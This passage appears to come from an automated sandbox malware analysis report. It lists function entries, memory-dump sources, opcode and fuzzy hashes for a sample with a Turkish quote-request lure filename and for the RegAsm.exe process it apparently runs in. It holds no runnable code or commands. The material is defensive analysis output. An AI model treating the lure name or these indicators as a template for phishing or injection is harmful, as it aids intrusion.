Instruction Fuzzy Hash: 1252D570B0CA098FDB68EF2CD455A79B7E5EF55301F2401BDE49EC7292DE28AC468781

Function 00007FFB4AD8B120 Relevance: .4, Instructions: 387COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abca9fbfb28ca9ac3ed1329a5152ac2d5dde0e0ccd415d32812a5d084f529fa1
Instruction ID: c1f5514e069b8861062e73ab33325169e2d90a6b6101a66cb7623ce68885fe8f
Opcode Fuzzy Hash: abca9fbfb28ca9ac3ed1329a5152ac2d5dde0e0ccd415d32812a5d084f529fa1
Instruction Fuzzy Hash: BBC15671A0CB854FE71DDF38C4921B5B7E2FF95301B2446BED4D6C72A2DA28A806C781

Function 00007FFB4AD80C81 Relevance: 1.8, APIs: 1, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fcadca37e0bb9c1f9bc294bb54312e52b1fcc51665e220b4fa5bdbadfbc30b5
Instruction ID: 2fce6c896258b1e1ee9ad51479a59d20ce38a2ca278572a16f1b0178f7a04b4c
Opcode Fuzzy Hash: 0fcadca37e0bb9c1f9bc294bb54312e52b1fcc51665e220b4fa5bdbadfbc30b5
Instruction Fuzzy Hash: 62A1B171B1DA084FEB58EB3CD45A2B9B7D5EF99310F1041BEE05EC3292CD28AC418761

Function 00007FFB4AD804EA Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNELBASE ref: 00007FFB4AD80F4F

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ConsoleFree
String ID:
API String ID: 771614528-0
Opcode ID: adc2d22de902041514d1246713d840d87e22f8577af618245fcef1afb9751d3f
Instruction ID: 518fcab042198bd74f7b5d7847e1ba4fba46eae3908f6eb4b2f9f2106cddaed4
Opcode Fuzzy Hash: adc2d22de902041514d1246713d840d87e22f8577af618245fcef1afb9751d3f
Instruction Fuzzy Hash: E7217171908A0C8FEB28EF99D84ABFABBE4EB55321F00416ED04AD3551DB74A44ACB51

Function 00007FFB4AE5026B Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673716540.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ae50000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75107f4f0f3b6693db162e79f6fb0b8f5c213592795dd90b2c9f2f3ca9d55fe2
Instruction ID: bfcbde095e26542ba2ac9bffa108af353c37e6192a25ca2143657937b1c90c18
Opcode Fuzzy Hash: 75107f4f0f3b6693db162e79f6fb0b8f5c213592795dd90b2c9f2f3ca9d55fe2
Instruction Fuzzy Hash: D451E67190CA898FEB55FF68D9519A87BE0FF55304F3405FDE05ACB18BDA24A846C740

Function 00007FFB4AE510C9 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673716540.00007FFB4AE50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ae50000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af728eecd09e3d9f2946fb6b41ec6317ccf6cf2789f49af93094c82afe9fea8d
Instruction ID: 60cc8472e3a0fd8fa0994c9a71f8f718b7c0d696a4542b7aa9a1b3c2f3639ca7
Opcode Fuzzy Hash: af728eecd09e3d9f2946fb6b41ec6317ccf6cf2789f49af93094c82afe9fea8d
Instruction Fuzzy Hash: A74188B290DB894FEB46FF68D8554A83BE0FF55308F2400FED05ACB196DA26A800C381

Non-executed Functions

Function 00007FFB4AD864D3 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1673468984.00007FFB4AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4ad80000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9429535d5dbdb5923e497bd2e7f71a0eda861bf447e5c465237e6f665f76a4ea
Instruction ID: f1b510fccc15482784ee866e460251e986e9502d6105224d1d9c2071154177e8
Opcode Fuzzy Hash: 9429535d5dbdb5923e497bd2e7f71a0eda861bf447e5c465237e6f665f76a4ea
Instruction Fuzzy Hash: 7431686260D00D1FD31CAD3DCD8A8B77B5EDB8332072582BEE4D6C71A2EC54B8174290

Analysis Process: RegAsm.exePID: 3344, Parent PID: 6740COMMON

Executed Functions

Function 013FA088 Relevance: .9, Instructions: 894COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfad21e4ef251e2ad3092e6c3fab96ed32ff95bf08607688dd9b9a1e03b2707c
Instruction ID: 5bcde5805d55310f239fcce77148ee31f1ee37b1e385a80e1cf03c6eb2e01974
Opcode Fuzzy Hash: dfad21e4ef251e2ad3092e6c3fab96ed32ff95bf08607688dd9b9a1e03b2707c
Instruction Fuzzy Hash: 73828C35A00209DFDB15CFA8C984AAEBBF6FF88314F158569EA099B361D730ED45CB50

Function 013F29E0 Relevance: .8, Instructions: 844COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 010b2ee5082b353c4373ee3c75adf1f891ce5b86903eaf42292e00386e8fcf5c
Instruction ID: dd8e268a3f44bde27cf18247435fd3ef9872e09041f7407c3b83e02b17644063
Opcode Fuzzy Hash: 010b2ee5082b353c4373ee3c75adf1f891ce5b86903eaf42292e00386e8fcf5c
Instruction Fuzzy Hash: 3D52E232D04757CBCBB5CF38C8D629BBFB1BF41224B58846DD88686606E734AC11DB96

Function 013F69A0 Relevance: .5, Instructions: 514COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b240610f5978264f782debde6952795d14f0b0ee595eb5e1566222c108f64820
Instruction ID: 5ca2187046c9530d3bf4218651d3dc455387932b0a95cfcc3a7926c7d5d4daa4
Opcode Fuzzy Hash: b240610f5978264f782debde6952795d14f0b0ee595eb5e1566222c108f64820
Instruction Fuzzy Hash: F6126DB0A002199FDB14DF69C854BAEBBB6FF88704F108529E906DB3A5DB319D41CB90

Function 013F7118 Relevance: .4, Instructions: 409COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b980ab3d1e6a6c054bf8c4179e851aaf64aa0dd81b69fa630363317074a5b932
Instruction ID: ed33ccf8bbcb4c842a032424b45f937befc8ee510edbadf9a321da981e7c0bfd
Opcode Fuzzy Hash: b980ab3d1e6a6c054bf8c4179e851aaf64aa0dd81b69fa630363317074a5b932
Instruction Fuzzy Hash: 03F11B70A10219DFDB55CF69C888AADBBB6FF88318F55806AEA05EB361D734DC41CB50

Function 013FC146 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac8abb7cce8882f917f2c3dc0459bfea6653dae9fc90eb452c315b4cb2a6dd6
Instruction ID: 8ea623ae8a3ff95cc2a2e703a31ce0d3fb7721cdf4b3f3704ba88694e09ad478
Opcode Fuzzy Hash: 9ac8abb7cce8882f917f2c3dc0459bfea6653dae9fc90eb452c315b4cb2a6dd6
Instruction Fuzzy Hash: 2CA1E775E00218DFDB18DFAAD884A9DBBF2FF89304F14906AD509AB361DB349941CF50

Function 013F5362 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6526398d252f442289b9b119c6eb10ffa0e1a5c1fbb80b3f03573e5a980e33f4
Instruction ID: 1b1e3bea80a793568af20af268d532cc05ea4164f41ee6de647ecc5d02609507
Opcode Fuzzy Hash: 6526398d252f442289b9b119c6eb10ffa0e1a5c1fbb80b3f03573e5a980e33f4
Instruction Fuzzy Hash: F591E474E00218CFEB18CFA9D884A9DBBF2FF88315F1580A9D509AB365DB349945CF50

Function 013FC468 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961ef0ee014d68d2e3fce7ae2b0734cd19064c097125787ab3de182d8ebc31d0
Instruction ID: 3dd18ca29707efe18f97ec7e3102338fc1e46ecd9e9ed49a0894678425a9879c
Opcode Fuzzy Hash: 961ef0ee014d68d2e3fce7ae2b0734cd19064c097125787ab3de182d8ebc31d0
Instruction Fuzzy Hash: C581C374E04218CFEB18DFAAD884A9DBBF2BF88314F14D06AD519AB365DB349941CF50

Function 013FCA08 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16bf42552164a75c0eaf582603984229a448d13c633fafc2c63df33815bc418a
Instruction ID: 6b43e6022e746c4eb5baee97c9486825d46caf053f614b9c177df582813db75c
Opcode Fuzzy Hash: 16bf42552164a75c0eaf582603984229a448d13c633fafc2c63df33815bc418a
Instruction Fuzzy Hash: B981A074E00218CFEB18DFAAD884A9DBBF2BF88304F149069E519AB365DB309945CF50

Function 013FD278 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62f78d50b86cfee5e47c29b07127e70621adc9b2cd3653e26aa0a679af3bfef9
Instruction ID: e199866c9f4be055b80e9c5bffd13ddf427e1a0f63c13740e36ce5d7335cdb96
Opcode Fuzzy Hash: 62f78d50b86cfee5e47c29b07127e70621adc9b2cd3653e26aa0a679af3bfef9
Instruction Fuzzy Hash: 7F81A274E00218CFEB18DFAAD884A9DBBF2FF88304F148069E519AB365DB349945CF50

Function 013FC738 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73eede71f7358d3bd478e6d0bcd6ef1489c5e2a8ada2988927a43483d198b9fb
Instruction ID: a140d812a8d5a1c4fdb4020645c45459d384ff4ac2ed4e79d8122186b1269e7c
Opcode Fuzzy Hash: 73eede71f7358d3bd478e6d0bcd6ef1489c5e2a8ada2988927a43483d198b9fb
Instruction Fuzzy Hash: E881E474E00218DFEB18DFAAD984A9DBBF2BF88314F14D069D519AB365DB309941CF50

Function 013FCCD8 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ed97354c91a59e00ebe24064b5a5d2c2fc6a6ee9b54941f62d259f5fe6c9c6f
Instruction ID: 9c62ca5d1263d36703d3bdae94f4fd4e795584b555ed4bdc0b92fa4fa71991cf
Opcode Fuzzy Hash: 1ed97354c91a59e00ebe24064b5a5d2c2fc6a6ee9b54941f62d259f5fe6c9c6f
Instruction Fuzzy Hash: 0681C274E00218DFEB18DFAAD884A9DBBF2BF88305F14D069E519AB365DB309945CF50

Function 013FCFAA Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 102768aa08fbf12d3dc1b1ba40dc8f77b1125ffdf65b94dd216b183210d42573
Instruction ID: 591c8b4ac8bdfc1c6308a7fc5604cad4ec4aa5fa66fefa3c59097d730b264810
Opcode Fuzzy Hash: 102768aa08fbf12d3dc1b1ba40dc8f77b1125ffdf65b94dd216b183210d42573
Instruction Fuzzy Hash: 6581B174E00218CFEB58DFAAD884A9DBBF2BF88314F14C069E519AB365DB349945CF50

Function 013FE97A Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae468950b813883fad3e039e5e2b5c2cb16a999bb94c0f7a21b2c3da06ecc35d
Instruction ID: 55dd7aeaf5fa1b16b20d0c9bcc44e4fcb71deacff163c24e56333c4042a38c95
Opcode Fuzzy Hash: ae468950b813883fad3e039e5e2b5c2cb16a999bb94c0f7a21b2c3da06ecc35d
Instruction Fuzzy Hash: FF51A774E00208DFEB18DFAAD894A9DBBB2FF89704F25C029E915AB364DB345845CF54

Function 013FE988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41a2bfc9075b57f74c3207abd865c7fb310e51a1e0b07b1a7dbaa213e2ca19d4
Instruction ID: e9c96d9aac8bf808d04daf7a2570e8f63a1a412d6b1c3c6b38832c854a45cfef
Opcode Fuzzy Hash: 41a2bfc9075b57f74c3207abd865c7fb310e51a1e0b07b1a7dbaa213e2ca19d4
Instruction Fuzzy Hash: B7519374E00308DFEB18DFAAD494A9EBBB2BF89700F258029E915AB364DB345945CF54

Function 013FE007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef6943e9f909a3b1287b0ed435f23bc2d6ced74301f1337003809c94818c198
Instruction ID: 083a20f39f2522011324cd33f93832ff6d1ffd8a7809bf5ba3a133a906ed511f
Opcode Fuzzy Hash: bef6943e9f909a3b1287b0ed435f23bc2d6ced74301f1337003809c94818c198
Instruction Fuzzy Hash: 6D12B8790713439FE2666B70E2BC16ABF61FB0F3637846C10E90FA146DEB71044A8B25

Function 013FE018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9846a5a3db77350e9f27aeaedfee42e9ad3af696a9f571c77dc4be1f3d28f7ba
Instruction ID: c36f7498f6c30d6619df1e971e23aac4e0cbfc47d20058eb07799039fa5a9020
Opcode Fuzzy Hash: 9846a5a3db77350e9f27aeaedfee42e9ad3af696a9f571c77dc4be1f3d28f7ba
Instruction Fuzzy Hash: F712A8790713439FE2666B70E2BC16ABF61FB0F3637846D10E91FA146DEB71044A8B25

Function 013F0C8F Relevance: .5, Instructions: 547COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f806333f5c09a45f4c7a96761b9fbd147048f936ea82faa68a5639cd49ddfba7
Instruction ID: 031fc05b4a1bf2992b1b805c370fa7a7191002728c664575dafb021ec5b8501a
Opcode Fuzzy Hash: f806333f5c09a45f4c7a96761b9fbd147048f936ea82faa68a5639cd49ddfba7
Instruction Fuzzy Hash: 3E52CA74900219CFCB64DF28E994BDDBBB6FB88702F1085A9D409A7364DB386D85CF81

Function 013F0CA0 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3f1e6aca8d097caadde49aa3def94e2263e245f00e7c1dc02e5f2c8757c8d2b
Instruction ID: 8070a0017649cb145a1caa93de7d461409a5d5db1337c7b124d4d036d8370278
Opcode Fuzzy Hash: f3f1e6aca8d097caadde49aa3def94e2263e245f00e7c1dc02e5f2c8757c8d2b
Instruction Fuzzy Hash: 0452A974900219CFCB64DF68E994BDDBBB6FB88702F1085A9D409A7364DB386D85CF81

Function 013F76F1 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64bc8892c1810257feb2e35e0cc85bceaec8382163f43667d795a24a32c098ba
Instruction ID: f9c3d0a99ff27d13d86e336fcb0d3b1526fd81f26994dbef6f593af8d2f38ed1
Opcode Fuzzy Hash: 64bc8892c1810257feb2e35e0cc85bceaec8382163f43667d795a24a32c098ba
Instruction Fuzzy Hash: 26125A30A002099FDB25DF69D884A9EBBF2FF89718F148569EA099B361D731ED41CB50

Function 013F5F38 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7795a730d913cbf3f0eee7182b18160244919b2998cba64e390af76673d8eaed
Instruction ID: 386f65aa2efcf403ffcac035f042975a19d037205043eff4384eef79101e5bd7
Opcode Fuzzy Hash: 7795a730d913cbf3f0eee7182b18160244919b2998cba64e390af76673d8eaed
Instruction Fuzzy Hash: 0091BE713042058FDB269F28C854B6E7BB6FF89209F14446DEA068B3A6CB78CC41C791

Function 013F6498 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 382bbd10243c033acf952c31c8006a7aba3e72be199463a6efe30a948d2ac60b
Instruction ID: a231fd377b293d11f472b1f1489d3de0d86a725c26316a45b19a07890c59272b
Opcode Fuzzy Hash: 382bbd10243c033acf952c31c8006a7aba3e72be199463a6efe30a948d2ac60b
Instruction Fuzzy Hash: 6B81B0B0B00509CFCB14DF6DC489A69BBB6FF88629B14816DD606EB365DB31EC41CB90

Function 013F9A10 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231f2f148310b1652143d50624f3233b3a776a737f9ba9cfd2772a2293c9547d
Instruction ID: f56bacad69ac648bf1f36cbb5446a2cf19f373239ff6c3c6a41e2aea36c04bb1
Opcode Fuzzy Hash: 231f2f148310b1652143d50624f3233b3a776a737f9ba9cfd2772a2293c9547d
Instruction Fuzzy Hash: A981E631A006059FCB15CF2CC88479ABBB5FF8532CB55C66AEA589B355C331EC55CBA0

Function 013F80D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9ba37b818452f7e8d8d53a73dbb8aa0c88323e167b5a6796360b2c428d66d8
Instruction ID: b1c19c5fd00fab3d4708912e32b078da9d09a566aea1d759e4068925e04b129e
Opcode Fuzzy Hash: 6e9ba37b818452f7e8d8d53a73dbb8aa0c88323e167b5a6796360b2c428d66d8
Instruction Fuzzy Hash: 5D713A397006099FDB29DF6CC894A6E7BE5AF49348B1501A9EA05DB371DB70EC41CB50

Function 013FAEBA Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c33077872885a0faebbe66bc40d1eb632342f55615ea68b9d3770adc81134e5
Instruction ID: 7a247574ab254b6e55ba9237ca399a56ef884844b29d1c54bd07268fb1e73b8a
Opcode Fuzzy Hash: 9c33077872885a0faebbe66bc40d1eb632342f55615ea68b9d3770adc81134e5
Instruction Fuzzy Hash: DF61B271B002058FDB14DB69C844BAEBBF6FFC8614F148569E61ADB3A9DB31DC418B90

Function 013FF3F1 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5b5e75769d0abaa4cdabae408011afb616032a25af602566e9ff8dd090330be
Instruction ID: 0c13ff8ceb76962ea4481f038b5f33130839947c3e3e0e10db67a320cab89bc2
Opcode Fuzzy Hash: d5b5e75769d0abaa4cdabae408011afb616032a25af602566e9ff8dd090330be
Instruction Fuzzy Hash: 5051CE74D01218CFDB15DFA5D954BEDBBB2FF89304F608129D80AAB2A4DB39594ACF40

Function 013F9C30 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0cceecb0ee3102a2e02a4018b2e802b375a2fe4dcafce567abec20358ec17a1
Instruction ID: 215f449ee5946903b1227d9f85204167e911dd999447977fcd3fcc69df333dcc
Opcode Fuzzy Hash: a0cceecb0ee3102a2e02a4018b2e802b375a2fe4dcafce567abec20358ec17a1
Instruction Fuzzy Hash: 5C5183317002099FDB15DF69D844B6ABBEAEF88358F14846AFA09CB395D771CC41CBA1

Function 013FD548 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0a259170595271111fc1a1e5f5b078a68b271d40662ef929bf0a76e458d30ef
Instruction ID: 7847cc7aa425c8b571f86b08321f9be1eb188d483fbc7212a797dc20755c874f
Opcode Fuzzy Hash: d0a259170595271111fc1a1e5f5b078a68b271d40662ef929bf0a76e458d30ef
Instruction Fuzzy Hash: 8E518374E01208DFDB48DFA9D58499DBBF2FF89300F248169E919AB365DB31A805CF50

Function 013F41A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4964d6864d34cc585f52921d16807bb3f67fa30806c683bdc118ee0d497b430
Instruction ID: ceeba31a816e335e7fc58cc21c9d681a21fc6bbad14269cc292054ec2ab1d311
Opcode Fuzzy Hash: e4964d6864d34cc585f52921d16807bb3f67fa30806c683bdc118ee0d497b430
Instruction Fuzzy Hash: 47517F74E01209DFCB48DFA9D59499DBBB6FF89305B209069E815BB324DB35AC42CF50

Function 013FA303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d0f7bf4ad175fbef69526eb18d2d3e9da47cb82412ef6e62a264f070701f628
Instruction ID: 071ee0d4c5d629d1b7b992e1ca8102ea8820449447467924504f7945074a123d
Opcode Fuzzy Hash: 4d0f7bf4ad175fbef69526eb18d2d3e9da47cb82412ef6e62a264f070701f628
Instruction Fuzzy Hash: 32418E31A00249DFCF16CFA8C844B9DBFB2EF49314F04845AEA09AB3A2D371E954CB50

Function 013F6FC8 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4018665014.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_13f0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45fa1b2aec7d22d629d25d997d4bde104c27d3ae903212e0a806bcb8eda19624
Instruction ID: bbaa9c70932e992e4dcfba44831a9da68fe03b1690ad6ef29f41e6e72b499aa3
